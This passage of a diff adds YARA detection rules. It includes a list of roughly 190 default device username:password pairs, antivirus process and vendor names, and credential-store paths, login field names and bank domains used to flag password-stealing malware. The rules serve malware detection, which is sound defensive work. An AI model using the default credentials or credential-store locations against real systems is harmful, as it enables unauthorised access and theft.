+    $br213 = "admin:adslroot" nocase
+    $br214 = "admin:articon" nocase
+    $br215 = "admin:asante" nocase
+    $br216 = "admin:asd" nocase
+    $br217 = "admin:atlantis" nocase
+    $br218 = "admin:barricade" nocase
+    $br219 = "admin:bintec" nocase
+    $br220 = "admin:changeme" nocase
+    $br221 = "admin:comcomcom" nocase
+    $br222 = "admin:default" nocase
+    $br223 = "admin:draadloos" nocase
+    $br224 = "admin:epicrouter" nocase
+    $br225 = "admin:extendnet" nocase
+    $br226 = "admin:hagpolm1" nocase
+    $br227 = "admin:hello" nocase
+    $br228 = "admin:hp.com" nocase
+    $br229 = "admin:imss7.0" nocase
+    $br230 = "admin:ironport" nocase
+    $br231 = "admin:isee" nocase
+    $br232 = "admin:leviton" nocase
+    $br233 = "admin:linga" nocase
+    $br234 = "admin:michelangelo" nocase
+    $br235 = "admin:microbusiness" nocase
+    $br236 = "admin:motorola" nocase
+    $br237 = "admin:mu" nocase
+    $br238 = "admin:my_DEMARC" nocase
+    $br239 = "admin:netadmin" nocase
+    $br240 = "admin:noway" nocase
+    $br241 = "admin:operator" nocase
+    $br242 = "admin:password" nocase
+    $br243 = "admin:passwort" nocase
+    $br244 = "admin:pfsense" nocase
+    $br245 = "admin:rmnetlm" nocase
+    $br246 = "admin:secure" nocase
+    $br247 = "admin:setup" nocase
+    $br248 = "admin:smallbusiness" nocase
+    $br249 = "admin:smcadmin" nocase
+    $br250 = "admin:switch" nocase
+    $br251 = "admin:symbol" nocase
+    $br252 = "admin:synnet" nocase
+    $br253 = "admin:sysAdmin" nocase
+    $br254 = "admin:w2402" nocase
+    $br255 = "admin:x-admin" nocase
+    $br256 = "administrator:" nocase
+    $br257 = "adminstat:OCS" nocase
+    $br258 = "adminstrator:changeme" nocase
+    $br259 = "adminttd:adminttd" nocase
+    $br260 = "adminuser:OCS" nocase
+    $br261 = "adminview:OCS" nocase
+    $br262 = "apc:apc" nocase
+    $br263 = "cablecom:router" nocase
+    $br264 = "cac_admin:cacadmin" nocase
+    $br265 = "ccrusr:ccrusr" nocase
+    $br266 = "cellit:cellit" nocase
+    $br267 = "cisco:" nocase
+    $br268 = "citel:password" nocase
+    $br269 = "comcast:" nocase
+    $br270 = "comcast:1234" nocase
+    $br271 = "craft:" nocase
+    $br272 = "cusadmin:highspeed" nocase
+    $br273 = "customer:none" nocase
+    $br274 = "dadmin:dadmin01" nocase
+    $br275 = "davox:davox" nocase
+    $br276 = "deskalt:password" nocase
+    $br277 = "deskman:changeme" nocase
+    $br278 = "desknorm:password" nocase
+    $br279 = "deskres:password" nocase
+    $br280 = "device:device" nocase
+    $br281 = "diag:danger" nocase
+    $br282 = "disttech:4tas" nocase
+    $br283 = "e250:e250changeme" nocase
+    $br284 = "e500:e500changeme" nocase
+    $br285 = "guest:" nocase
+    $br286 = "guest:guest" nocase
+    $br287 = "helpdesk:OCS" nocase
+    $br288 = "hsa:hsadb" nocase
+    $br289 = "images:images" nocase
+    $br290 = "install:secret" nocase
+    $br291 = "installer:installer" nocase
+    $br292 = "intel:intel" nocase
+    $br293 = "intermec:intermec" nocase
+    $br294 = "isp:isp" nocase
+    $br295 = "jagadmin:" nocase
+    $br296 = "login:access" nocase
+    $br297 = "login:admin" nocase
+    $br298 = "m1122:m1122" nocase
+    $br299 = "maint:maint" nocase
+    $br300 = "maint:ntacdmax" nocase
+    $br301 = "manage:!manage" nocase
+    $br302 = "manager:admin" nocase
+    $br303 = "manager:friend" nocase
+    $br304 = "manager:manager" nocase
+    $br305 = "manuf:xxyyzz" nocase
+    $br306 = "mediator:mediator" nocase
+    $br307 = "mlusr:mlusr" nocase
+    $br308 = "monitor:monitor" nocase
+    $br309 = "mso:w0rkplac3rul3s" nocase
+    $br310 = "naadmin:naadmin" nocase
+    $br311 = "netadmin:nimdaten" nocase
+    $br312 = "netman:" nocase
+    $br313 = "netrangr:attack" nocase
+    $br314 = "netscreen:netscreen" nocase
+    $br315 = "none:0" nocase
+    $br316 = "none:admin" nocase
+    $br317 = "operator:" nocase
+    $br318 = "operator:$chwarzepumpe" nocase
+    $br319 = "operator:1234" nocase
+    $br320 = "operator:operator" nocase
+    $br321 = "patrol:patrol" nocase
+    $br322 = "piranha:piranha" nocase
+    $br323 = "piranha:q" nocase
+    $br324 = "public:" nocase
+    $br325 = "public:public" nocase
+    $br326 = "radware:radware" nocase
+    $br327 = "readonly:lucenttech2" nocase
+    $br328 = "readwrite:lucenttech1" nocase
+    $br329 = "replicator:replicator" nocase
+    $br330 = "root:0P3N" nocase
+    $br331 = "root:1234" nocase
+    $br332 = "root:12345" nocase
+    $br333 = "root:3ep5w2u" nocase
+    $br334 = "root:Cisco" nocase
+    $br335 = "root:Mau'dib" nocase
+    $br336 = "root:admin" nocase
+    $br337 = "root:admin_1" nocase
+    $br338 = "root:ascend" nocase
+    $br339 = "root:attack" nocase
+    $br340 = "root:blender" nocase
+    $br341 = "root:calvin" nocase
+    $br342 = "root:changeme" nocase
+    $br343 = "root:davox" nocase
+    $br344 = "root:default" nocase
+    $br345 = "root:fivranne" nocase
+    $br346 = "root:iDirect" nocase
+    $br347 = "root:pass" nocase
+    $br348 = "root:password" nocase
+    $br349 = "root:root" nocase
+    $br350 = "root:tslinux" nocase
+    $br351 = "rwa:rwa" nocase
+    $br352 = "scmadmin:scmchangeme" nocase
+    $br353 = "scout:scout" nocase
+    $br354 = "security:security" nocase
+    $br355 = "service:smile" nocase
+    $br356 = "setup:changeme" nocase
+    $br357 = "setup:setup" nocase
+    $br358 = "smc:smcadmin" nocase
+    $br359 = "storwatch:specialist" nocase
+    $br360 = "stratacom:stratauser" nocase
+    $br361 = "super.super:" nocase
+    $br362 = "super.super:master" nocase
+    $br363 = "super:5777364" nocase
+    $br364 = "super:super" nocase
+    $br365 = "superadmin:secret" nocase
+    $br366 = "superman:21241036" nocase
+    $br367 = "superman:talent" nocase
+    $br368 = "superuser:admin" nocase
+    $br369 = "supervisor:" nocase
+    $br370 = "supervisor:PlsChgMe" nocase
+    $br371 = "supervisor:supervisor" nocase
+    $br372 = "support:h179350" nocase
+    $br373 = "support:support" nocase
+    $br374 = "sys:uplink" nocase
+    $br375 = "sysadmin:PASS" nocase
+    $br376 = "sysadmin:password" nocase
+    $br377 = "system:sys" nocase
+    $br378 = "manager:change_on_install" nocase
+    $br379 = "system:password" nocase
+    $br380 = "teacher:password" nocase
+    $br381 = "telecom:telecom" nocase
+    $br382 = "tellabs:tellabs#1" nocase
+    $br383 = "temp1:password" nocase
+    $br384 = "tiara:tiaranet" nocase
+    $br385 = "tiger:tiger123" nocase
+    $br386 = "topicalt:password" nocase
+    $br387 = "topicnorm:password" nocase
+    $br388 = "topicres:password" nocase
+    $br389 = "user:password" nocase
+    $br390 = "user:tivonpw" nocase
+    $br391 = "user:user" nocase
+    $br392 = "vcr:NetVCR" nocase
+    $br393 = "vt100:public" nocase
+    $br394 = "webadmin:1234" nocase
+    $br395 = "webadmin:webadmin" nocase
+    $br396 = "websecadm:changeme" nocase
+    $br397 = "wlse:wlsedb" nocase
+    $br398 = "wradmin:trancell" nocase
+    
+    condition:
+    10 of ($br*)
+}
+
+rule antiav 
+{
+    meta:
+    description = "Attempts to thwarts AV"
+    
+	strings:
+    $anti02 = "vptray" nocase
+    $anti03 = "KavStart" nocase
+    $anti04 = "360Safebox" nocase
+    $anti05 = "360Safetray" nocase
+    $anti06 = "KSWebShield.EXE" nocase
+    $anti08 = "Rtvscan.EXE" nocase
+    $anti09 = "ccSetMgr.EXE" nocase
+    $anti0a = "ccEvtMgr.EXE" nocase
+    $anti0b = "naPrdMgr.EXE" nocase
+    $anti0c = "VsTskMgr.EXE" nocase
+    $anti0d = "kav32.EXE" nocase
+    $anti0e = "kissvc.EXE" nocase
+    $anti0f = "KPfwSvc.EXE" nocase
+    $anti11 = "HijackThis.EXE" nocase
+    $anti12 = "PFW.EXE" nocase
+    $anti13 = "TrojDie.KXP" nocase
+    $anti14 = "Trojanwall.EXE" nocase
+    $anti15 = "TrojanDetector.EXE" nocase
+    $anti16 = "QQDoctor.EXE" nocase
+    $anti17 = "RSTray.EXE" nocase
+    $anti18 = "ArSwp.EXE" nocase
+    $anti19 = "SREngLdr.EXE" nocase
+    $anti1a = "rfwsrv.EXE" nocase
+    $anti1b = "rfwProxy.EXE" nocase
+    $anti1c = "Rsaupd.EXE" nocase
+    $anti1d = "RsMain.EXE" nocase
+    $anti1e = "RsAgent.EXE" nocase
+    $anti1f = "RavStub.EXE" nocase
+    $anti20 = "rfwmain.EXE" nocase
+    $anti21 = "Rfwstub.EXE" nocase
+    $anti22 = "GFUpd.EXE" nocase
+    $anti23 = "GuardField.EXE" nocase
+    $anti24 = "Runiep.EXE" nocase
+    $anti25 = "KAVPFW.EXE" nocase
+    $anti26 = "kavstart.EXE" nocase
+    $anti27 = "kmailmon.EXE" nocase
+    $anti28 = "kwatch.EXE" nocase
+    $anti29 = "KASARP.EXE" nocase
+    $anti2a = "RAV.EXE" nocase
+    $anti2b = "ANTIARP.EXE" nocase
+    $anti2c = "VPTRAY.EXE" nocase
+    $anti2d = "VPC32.EXE" nocase
+    $anti2e = "AutoRunKiller.EXE" nocase
+    $anti2f = "Regedit.EXE" nocase
+    $anti30 = "WOPTILITIES.EXE" nocase
+    $anti31 = "Ast.EXE" nocase
+    $anti32 = "Mmsk.EXE" nocase
+    $anti33 = "Frameworkservice.EXE" nocase
+    $anti34 = "KRegEx.EXE" nocase
+    $anti35 = "egui.EXE" nocase
+    $anti36 = "ekrn.EXE" nocase
+    $anti37 = "nod32krn.EXE" nocase
+    $anti38 = "Nod32kui.EXE" nocase
+    $anti39 = "Navapsvc.EXE" nocase
+    $anti3a = "KVSrvXP.EXE" nocase
+    $anti3b = "KVMonxp.KXP" nocase
+    $anti3c = "KVWSC.EXE" nocase
+    $anti3d = "Iparmor.EXE" nocase
+    $anti3e = "IceSword.EXE" nocase
+    $anti3f = "rsnetsvr.EXE" nocase
+    $anti40 = "RavTask.EXE" nocase
+    $anti41 = "RavMon.EXE" nocase
+    $anti42 = "ScanFrm.EXE" nocase
+    $anti43 = "RavMonD.EXE" nocase
+    $anti44 = "CCenter.EXE" nocase
+    $anti45 = "RAVTRAY.EXE" nocase
+    $anti46 = "Ravservice.EXE" nocase
+    $anti47 = "AvMonitor.EXE" nocase
+    $anti48 = "safeboxTray.EXE" nocase
+    $anti49 = "360safebox.EXE" nocase
+    $anti4a = "360tray.EXE" nocase
+    $anti4b = "360safe.EXE" nocase
+    $anti4c = "LiveUpdate360.EXE" nocase
+    $anti4d = "360rpt.EXE" nocase
+    $anti4e = "RavCCenter" nocase
+    $anti4f = "RsRavMon" nocase
+    $anti51 = "RsScanSrv" nocase
+    $anti52 = "Kingsoft" nocase
+    $anti53 = "EsuSafeguard.exe" nocase
+    $anti54 = "LiveUpdate360.exe" nocase
+    $anti55 = "Iparmor.exe" nocase
+    $anti56 = "KVWSC.ExE" nocase
+    $anti57 = "kvsrvxp.exe" nocase
+    $anti58 = "kvsrvxp.kxp" nocase
+    $anti59 = "KvXP.kxp" nocase
+    $anti5a = "KRegEx.exe" nocase
+    $anti5b = "AntiArp.exe" nocase
+    $anti5c = "Mctray.exe" nocase
+    $anti5d = "ccApp.exe" nocase
+    $anti5e = "VPTRAY.exe" nocase
+    $anti5f = "VPC32.exe" nocase
+    $anti60 = "scan32.exe" nocase
+    $anti61 = "FrameworkService.exe" nocase
+    $anti62 = "KASARP.exe" nocase
+    $anti63 = "TBMon.exe" nocase
+    $anti64 = "rfwmain.exe" nocase
+    $anti65 = "RavStub.exe" nocase
+    $anti66 = "Rfwstub.exe" nocase
+    $anti67 = "rfwProxy.exe" nocase
+    $anti68 = "rfwsrv.exe" nocase
+    $anti69 = "UpdaterUI.exe" nocase
+    $anti6b = "mfevtp" nocase
+    $anti6c = "McTaskManager" nocase
+    $anti6d = "McAfeeFramework" nocase
+    $anti6e = "McAfeeEngineService" nocase
+    $anti6f = "Kingsoft" nocase
+    $anti70 = "KPfwSvc" nocase
+    $anti71 = "KWhatchsvc" nocase
+    $anti74 = "KSWebShield.exe" nocase
+    $anti75 = "kissvc.exe" nocase
+    $anti76 = "kav32.exe" nocase
+    $anti77 = "kwatch.exe" nocase
+    $anti78 = "kavstart.exe" nocase
+    $anti79 = "kmailmon.exe" nocase
+    $anti7a = "GFUpd.exe" nocase
+    $anti7b = "Ravxp.exe" nocase
+    $anti7c = "GuardField.exe" nocase
+    $anti7d = "RsAgent.exe" nocase
+    $anti7e = "RavTRAY.exe" nocase
+    $anti7f = "rsnetsvr.exe" nocase
+    $anti80 = "ScanFrm.exe" nocase
+    $anti81 = "RavMonD.exe" nocase
+    $anti82 = "RAVMON.exe" nocase
+    $anti83 = "CCenter.exe" nocase
+    $anti84 = "RSTray.exe" nocase
+    $anti85 = "RAv.exe" nocase
+    $anti86 = "Rsaupd.exe" nocase
+    $anti87 = "Runiep.exe" nocase
+    $anti88 = "\\\\.\\pipe\\acsipc_server"
+    $anti89 = "____AVP.Root" fullword
+    $anti8a = "avguard01" fullword
+    $anti8b = "WDEnable" fullword
+    $anti8c = "antivirscheduler" nocase
+    $anti8d = "antivirservice" nocase
+    $anti8e = "apvxdwin" nocase
+    $anti8f = "aswupdsv" nocase
+    $anti90 = "avast!" nocase
+    $anti91 = "avast! antivirus" nocase
+    $anti92 = "avg8_tray" nocase
+    $anti93 = "avg8wd" nocase
+    $anti94 = "bdagent" nocase
+    $anti95 = "bdss" nocase
+    $anti96 = "caccprovsp" nocase
+    $anti97 = "cavrid" nocase
+    $anti98 = "ccproxy" nocase
+    $anti99 = "ccpwdsvc" nocase
+    $anti9a = "cctray" nocase
+    $anti9b = "drwebscheduler" nocase
+    $anti9c = "ehttpsrv" nocase
+    $anti9d = "emproxy" nocase
+    $anti9e = "fpavserver" nocase
+    $anti9f = "f-prot antivirus tray application" nocase
+    $antia0 = "gwmsrv" nocase
+    $antia1 = "istray" nocase
+    $antia2 = "k7emlpxy" nocase
+    $antia3 = "k7rtscan" nocase
+    $antia4 = "k7systemtray" nocase
+    $antia5 = "k7tsmngr" nocase
+    $antia6 = "k7tsstart" nocase
+    $antia7 = "livesrv" nocase
+    $antia8 = "liveupdate notice service" nocase
+    $antia9 = "mcafee hackerwatch service" nocase
+    $antiaa = "mcenui" nocase
+    $antiab = "mcmisupdmgr" nocase
+    $antiac = "mcmscsvc" nocase
+    $antiad = "mcnasvc" nocase
+    $antiae = "mcods" nocase
+    $antiaf = "mcpromgr" nocase
+    $antib0 = "mcproxy" nocase
+    $antib1 = "mcredirector" nocase
+    $antib2 = "mcsysmon" nocase
+    $antib3 = "mpfservice" nocase
+    $antib4 = "mps9" nocase
+    $antib5 = "msk80service" nocase
+    $antib6 = "mskagentexe" nocase
+    $antib7 = "officescannt monitor" nocase
+    $antib8 = "panda software controller" nocase
+    $antib9 = "pavfnsvr" nocase
+    $antiba = "pavprsrv" nocase
+    $antibb = "pavsvr" nocase
+    $antibc = "pshost" nocase
+    $antibd = "psimsvc" nocase
+    $antibe = "psksvcretail" nocase
+    $antibf = "rsccenter" nocase
+    $antic0 = "savadminservice" nocase
+    $antic1 = "savscan" nocase
+    $antic2 = "savservice" nocase
+    $antic3 = "sbamtray" nocase
+    $antic4 = "scaninicio" nocase
+    $antic5 = "sophos autoupdate service" nocase
+    $antic6 = "spam blocker for outlook express" nocase
+    $antic7 = "spamblocker" nocase
+    $antic8 = "spidermail" nocase
+    $antic9 = "symantec core lc" nocase
+    $antica = "threatfire" nocase
+    $anticb = "tpsrv" nocase
+    $anticc = "vsserv" nocase
+    $anticd = "IceSword" nocase fullword
+    $antice = "Malwarebytes" nocase fullword
+    $anticf = "outpost.exe" nocase fullword
+    $antid0 = "zlclient.exe" nocase fullword
+    $antid1 = "windefend" nocase fullword
+    $antid2 = "wscsvc" nocase fullword
+    $antid3 = "ersvc" nocase fullword
+    $antid4 = "wersvc" nocase fullword
+	$antid5 = "avg.com" nocase
+    $antid6 = "virustotal.com" nocase
+    $antid7 = "avast.com" nocase
+    $antid8 = "symantec.com" nocase
+    $antid9 = "mcafee.com" nocase
+    $antida = "comodo.com" nocase
+    $antidb = "kaspersky.com" nocase
+    $antidc = "sophos.com" nocase
+    $antidd = "pandasecurity.com" nocase
+    $antide = "eset.com" nocase
+    $antidf = "clamwin.com" nocase
+    $antif0 = "bitdefender.com" nocase
+    $antif1 = "trendmicro.com" nocase
+    $antif2 = "us.mcafee.com" nocase
+    $antif3 = "avira.com" nocase
+    $antif4 = "freebyte.com" nocase
+    $antif5 = "f-prot.com" nocase
+    $antif6 = "threatinfo.trendmicro.com" nocase
+    $antif7 = "sunbeltsoft" nocase
+    $antif8 = "aladdin.com" nocase
+    $antif9 = "authentium.com" nocase
+    $antifa = "avp.com" nocase
+    $antifb = "customer.symantec.com" nocase
+    $antifc = "ewido.com" nocase
+    $antifd = "f-secure.com" nocase
+    $antife = "free-av.com" nocase
+    $antiff = "global.ahnlab.com" nocase
+    $anti001 = "grisoft.com" nocase
+    $anti002 = "hispasec.com" nocase
+    $anti003 = "ikarus-software.at" nocase
+    $anti004 = "kaspersky-labs.com" nocase
+    $anti005 = "my-etrust.com" nocase
+    $anti006 = "nai.com" nocase
+    $anti007 = "networkassociates.com" nocase
+    $anti008 = "quickheal.com" nocase
+    $anti009 = "virus-buster.com" nocase
+    $anti00a = "viruslist.com" nocase
+    $anti00b = "microsoft" nocase
+    $anti00c = "windowsupdate" nocase
+    $anti00d = "wilderssecurity" nocase
+    $anti00e = "threatexpert" nocase
+    $anti00f = "castlecops" nocase
+    $anti010 = "spamhaus" nocase
+    $anti011 = "cpsecure" nocase
+    $anti012 = "arcabit" nocase
+    $anti013 = "emsisoft" nocase
+    $anti014 = "sunbelt" nocase
+    $anti015 = "securecomputing" nocase
+    $anti016 = "rising" nocase
+    $anti017 = "pctools" nocase
+    $anti018 = "norman" nocase
+    $anti019 = "k7computing" nocase
+    $anti01a = "ikarus" nocase
+    $anti01b = "hacksoft" nocase
+    $anti01c = "fortinet" nocase
+    $anti01d = "clamav" nocase
+    $anti01e = "comodo" nocase
+    $anti01f = "quickheal" nocase
+    $anti020 = "ahnlab" nocase
+    $anti021 = "centralcommand" nocase
+    $anti022 = "grisoft" nocase
+    $anti023 = "f-prot" nocase
+    $anti024 = "kaspersky" nocase
+    $anti025 = "f-secure" nocase
+    $anti026 = "computerassociates" nocase
+    $anti027 = "networkassociates" nocase
+    $anti028 = "etrust" nocase
+    $anti029 = "sophos" nocase
+    $anti02a = "trendmicro" nocase
+    $anti02b = "mcafee" nocase
+    $anti02c = "norton" nocase
+    $anti02d = "symantec" nocase
+    $anti02e = "defender" nocase
+    $anti032 = "Antirootkit" nocase fullword
+    $anti033 = "onecare" nocase fullword
+    $anti034 = "McAfee\\VSCore\\On Access Scanner\\BehaviourBlocking" nocase 
+    $anti035 = "AccessProtectionUserRules" nocase
+    $anti036 = "McAfee\\Common Framework\\SiteList.xml" nocase
+
+	condition:
+	5 of ($anti*)
+}
+
+rule injection
+{
+    meta: 
+    description = "Indicates attempt to inject code"
+    
+    strings:
+    $a = "injector" fullword nocase
+    $b = "injecter" fullword nocase
+    $c = "injector" fullword nocase wide
+    $d = "injecter" fullword nocase wide
+
+    condition:
+    any of them 
+}
+
+rule peertopeer
+{
+    meta:
+    description = "Indicates P2P file sharing attempts"
+    
+	strings:
+	$ptp1 = "BearShare" nocase
+	$ptp2 = "iMesh" nocase fullword
+	$ptp3 = "Shareaza" nocase
+	$ptp4 = "Kazaa" nocase
+	$ptp5 = "DC++" nocase
+	$ptp6 = "eMule" nocase
+	$ptp7 = "LimeWire" nocase
+
+	condition:
+	any of them
+}
+
+rule bankers 
+{
+    meta:
+    description = "Indicates banker / passwd stealer"
+
+	strings:
+	
+	$pass1 = "PK11_GetInternalKeySlot" fullword wide ascii
+	$pass2 = "PK11_FreeSlot" fullword wide ascii
+	$pass3 = "PK11SDR_Decrypt" fullword wide ascii
+	$pass4 = "PL_Base64Decode" fullword wide ascii
+	$pass5 = "#SharedObjects" nocase wide ascii
+	$pass6 = "IE:Password-Protected" nocase wide ascii
+	$pass7 = "IE AutoComplete" nocase wide ascii
+	$pass8 = "POP3 Password2" fullword wide ascii
+	$pass9 = "HTTPMail Password2" fullword wide ascii
+	$pass10 = "IE Auto Complete" wide ascii
+	$pass11 = "AutoComplete Passwords" wide ascii
+	$pass12 = "CopyGlyphDataFrom" wide ascii
+	$pass14 = "IE Cookies:" nocase wide ascii
+	$pass15 = "ie_cookies" nocase wide ascii
+	$pass16 = "Macromedia\\Flash Player" wide ascii
+	$pass17 = "flashfxp" nocase wide ascii
+	$pass18 = "wcx_ftp.ini" nocase wide ascii
+	$pass19 = "Total Commander" wide ascii
+	$pass20 = "software\\ipswitch\\ws_ftp" nocase wide ascii
+	$pass21 = "FAR manager" nocase wide ascii
+	$pass22 = "software\\martin prikryl\\winscp 2\\sessions" nocase wide ascii
+    $pass23 = "software\\ftpware\\coreftp\\sites" nocase wide ascii
+    $pass24 = "smartftp" nocase wide ascii
+    $pass25 = "Software\\Microsoft\\Internet Explorer\\IntelliForms\\Storage2" wide ascii
+    $pass26 = "\\Ares\\My Shared Folder" wide ascii
+    $pass27 = ":String" fullword wide ascii
+    $pass28 = "StringIndex" fullword wide ascii
+    $pass29 = "e161255a" fullword wide ascii
+    $pass30 = "5e7e8100" fullword wide ascii
+    $pass31 = "MS IE FTP Passwords" wide ascii
+    $pass32 = "IE:AutoComplete" nocase wide ascii
+    $pass34 = "wininetcachecredentials" nocase fullword wide ascii
+    $pass35 = "inetcomm server passwords" nocase wide ascii
+    $pass36 = "IMAP Password2" fullword wide ascii
+    $pass37 = "SOFTWARE\\RIT\\The Bat" nocase wide ascii
+    $pass38 = "Coffee Cup" nocase wide ascii
+    $pass39 = "TransSoft Ltd\\FTP Control 4" nocase wide ascii
+    $pass3a = "ControllFTP" nocase fullword wide ascii
+    $pass3b = "FTPWare\\COREFTP" nocase wide ascii
+    $pass3c = "GlobalSCAPE" nocase fullword wide ascii
+    $pass3d = "CuteFTP" nocase fullword wide ascii
+    $pass3e = "FileZilla" nocase fullword wide ascii
+    $pass3f = "FTP Navigator" nocase wide ascii
+    $pass40 = "NavigatorFTP" nocase wide ascii
+    $pass41 = "totalcmd" nocase wide ascii
+    $pass42 = "ghistler" nocase wide ascii
+    $pass43 = "moz_logins" 
+    $pass44 = "sqlite3_open"
+	
+	$logins0000 = "strmemberid="
+	$logins0001 = "strpassword"
+	$logins0002 = "&account="
+	$logins0005 = "strEmail="
+	$logins0006 = "strPassword="
+	$logins0007 = "strNexonID="
+	$logins0008 = "strPassword"
+	$logins0009 = "&loginname=df"
+	$logins000a = "hanpwd"
+	$logins000d = "l_id="
+	$logins000e = "l_pwd"
+	$logins000f = "mgid_enc2="
+	$logins0010 = "mgpwd_enc2"
+	$logins0011 = "GET /login/"
+	$logins0012 = "User_ID="
+	$logins0013 = "&npw1"
+	$logins0014 = "jumin2="
+	$logins0015 = "wbUserid="
+	$logins0016 = "&wbPasswd"
+	$logins0017 = "strNexonID="
+	$logins0018 = "strPassword"
+	$logins0019 = "txtLoginName="
+	$logins001a = "txtPassword"
+	$logins001b = "strmemberid="
+	$logins001c = "strpassword="
+	$logins001d = "&login="
+	$logins0021 = "uname="
+	$logins0023 = "&Email="
+	$logins0024 = "&Passwd"
+	$logins0025 = "acctname="
+	$logins0026 = "&passwd"
+	$logins0028 = "&pass"
+	$logins0029 = "&email="
+	$logins002a = "&password"
+	$logins002b = "&mail="
+	$logins002d = "&pass="
+	$logins002e = "internet banking" nocase
+    $logins002f = "account overview" nocase
+    $logins0030 = "viewstatement" nocase
+    $logins0031 = "account balance" nocase
+    $logins0032 = "available balance" nocase
+    $logins0034 = "qzpassword" nocase
+    $logins0035 = "accountnumber" nocase
+    $logins0036 = "pinnumber" nocase
+    $logins0037 = "tannumber" nocase
+    $logins0038 = "logontextbox" nocase
+    $logins0039 = "internetBanking" nocase
+    $logins003a = "AccountDetails" nocase
+    $logins003b = "balance details" nocase
+    $logins003c = "bank accounts" nocase
+    $logins003d = "security questions" nocase
+    $logins003e = "Web Cashplus" nocase
+    $logins003f = "injtoken" nocase
+    $logins0040 = "cash management" nocase
+    $logins0041 = "American Express" nocase
+    $logins0042 = "Mastercard" nocase fullword
+    $logins0043 = "Login confirmation" nocase
+    $logins0044 = "activate your account" nocase
+    $logins0045 = "wrong password" nocase
+    $logins0046 = "UIN#" nocase
+    $logins0047 = "login_email" 
+    $logins0048 = "txtAccountNumber" 
+    $logins0049 = "ecurityPin" 
+    $logins004a = "sortCode" 
+    $logins004b = "memorableAnswer" 
+    $logins004c = "txtCustomerID" 
+    $logins004d = "MBindexuserkey"
+    $logins004e = "ctlLoginFirstStep"
+    $logins004f = "__IDV_URL=hsbc.MyHSBC" 
+    $logins0050 = "SignInWelcome"
+    $logins0051 = "nputuserid" 
+    $logins0052 = "PwdPad=IfYouAreReadingThis" 
+    $logins0053 = "txtLoginPin" 
+    $logins0054 = "inputmemorable"
+    $logins0055 = "UserId1="
+	$bank0000 = ".bcvs.ch"
+	$bank0001 = ".dbs.com"
+	$bank0002 = ".directnet.com"
+	$bank0003 = ".inetbank.net.au"
+	$bank0004 = ".netbanking.ch"
+	$bank0005 = "adambanking.com"
+	$bank0006 = "advisernet.com.au"
+	$bank0007 = "alpha.gr"
+	$bank0008 = "amp.com.au"
+	$bank0009 = "apobank.de"
+	$bank000a = "baloise.ch"
+	$bank000b = "bam.it"
+	$bank000c = "bancatoscana.it"
+	$bank000d = "bancocaixageral.es"
+	$bank000e = "bank.ubs.com"
+	$bank000f = "bankatlantic.web-access.com"
+	$bank0010 = "banking.bankofscotland.co.uk"
+	$bank0011 = "banking.co.at"
+	$bank0012 = "bankofcyprus.gr"
+	$bank0013 = "bankofthewest.com"
+	$bank0014 = "bbva.es"
+	$bank0015 = "bbvanetoffice.com"
+	$bank0016 = "bcge.ch"
+	$bank0017 = "bonline.co.uk"
+	$bank0018 = "boq.com.au"
+	$bank0019 = "businesse-cashmanager.web-access.com"
+	$bank001a = "caixagirona.es"
+	$bank001b = "capitalone.com"
+	$bank001c = "capitalonesavings.co.uk"
+	$bank001d = "cashproweb.com"
+	$bank001e = "cbbusinessonline.com"
+	$bank001f = "citibank.ae"
+	$bank0020 = "citibank.co.uk"
+	$bank0021 = "citibank.com"
+	$bank0022 = "citibank.com.au"
+	$bank0023 = "citibank.com.ph"
+	$bank0024 = "citibank.de"
+	$bank0025 = "citibusinessonline.da-us.citibank.com"
+	$bank0026 = "commercial.wachovia.com"
+	$bank0027 = "cortalconsors.de"
+	$bank0028 = "csebo.it"
+	$bank0029 = "cua.com.au"
+	$bank002a = "direct.53.com"
+	$bank002b = "dollarbank.com"
+	$bank002c = "ebank.emporiki.gr"
+	$bank002d = "ebanking-services.com"
+	$bank002e = "ebanking.millenniumbank.gr"
+	$bank002f = "esgc.com"
+	$bank0030 = "express.53.com"
+	$bank0031 = "fbmedirect.com"
+	$bank0032 = "haspa.de"
+	$bank0033 = "homebank.nbg.gr"
+	$bank0034 = "icicibank.co.uk"
+	$bank0035 = "internet-banking.dbs.com.sg"
+	$bank0036 = "laiki.com"
+	$bank0037 = "lasallebank.com"
+	$bank0038 = "mps.it"
+	$bank0039 = "npbs.co.uk"
+	$bank003a = "onlineservices.wachovia.com"
+	$bank003b = "paco.cabel.it"
+	$bank003c = "paypal.com"
+	$bank003d = "postbank.de"
+	$bank003e = "postfinance.ch"
+	$bank003f = "probanx.net"
+	$bank0040 = "raiffeisendirect.ch"
+	$bank0041 = "reuschel.com"
+	$bank0042 = "sanostra.es"
+	$bank0043 = "sarasin.ch"
+	$bank0044 = "sparkasse-bgl.de"
+	$bank0045 = "sparkasse-nienburg.de"
+	$bank0046 = ".suntrust.com"
+	$bank0047 = "treasury.wamu.com"
+	$bank0048 = "ubp.ch"
+	$bank0049 = "ubs.com"
+	$bank004a = "uno-e.com"
+	$bank004b = "usb.com.cy"
+	$bank004c = "vip.lasallebank.com"
+	$bank004d = "vontobel.com"
+	$bank004e = "wachovia.com"
+	$bank0050 = "winbank.gr"
+	$bank0051 = "www.53.com"
+	$bank0052 = "zkb.ch"
+	$bank0053 = "access.imb.com.au"
+	$bank0054 = "accounts.key.com"
+	$bank0055 = "achpayments.wachovia.com"
+	$bank0056 = "areasegura.banif.es"
+	$bank0057 = "bancae.bancoetcheverria.es"
+	$bank0058 = "bank.netbanking.ch"
+	$bank0059 = "banking..ch"
+	$bank005a = "banking..de"
+	$bank005b = "banking.apobank.de"
+	$bank005c = "banking.bankofscotland.co.uk"
+	$bank005d = "banking.bekb.ch"
+	$bank005e = "banking.dkb.de"
+	$bank005f = "banking.firsttennessee."
+	$bank0060 = "banking.sparda.de"
+	$bank0061 = "banking.uboc.com"
+	$bank0062 = "banking.us.hsbc.com"
+	$bank0063 = "bankingportal..de"
+	$bank0064 = "banknet.columbiariverbank.com"
+	$bank0065 = "bbvanetoffice.com"
+	$bank0066 = "carenet.fnfismd.com"
+	$bank0068 = "cib.ibanking-services.com"
+	$bank0069 = "citibusinessonline.da-us.citibank.com"
+	$bank006b = "corporate-internet-banking.dbs.com"
+	$bank006c = "ctm.53.com"
+	$bank006d = "dealonline.dbs.com"
+	$bank006f = "e-banking.bcvs.ch"
+	$bank0070 = "easylink.bankofbermuda.com"
+	$bank0071 = "ebank.emporiki.gr"
+	$bank0072 = "ebanker.arabbank.com.au"
+	$bank0073 = "ebusiness.arabbank.ch"
+	$bank0074 = ".openbank.com"
+	$bank0075 = "essg.wachovia.com"
+	$bank0076 = "etimebanker.bankofthewest.com"
+	$bank0077 = "express.53.com"
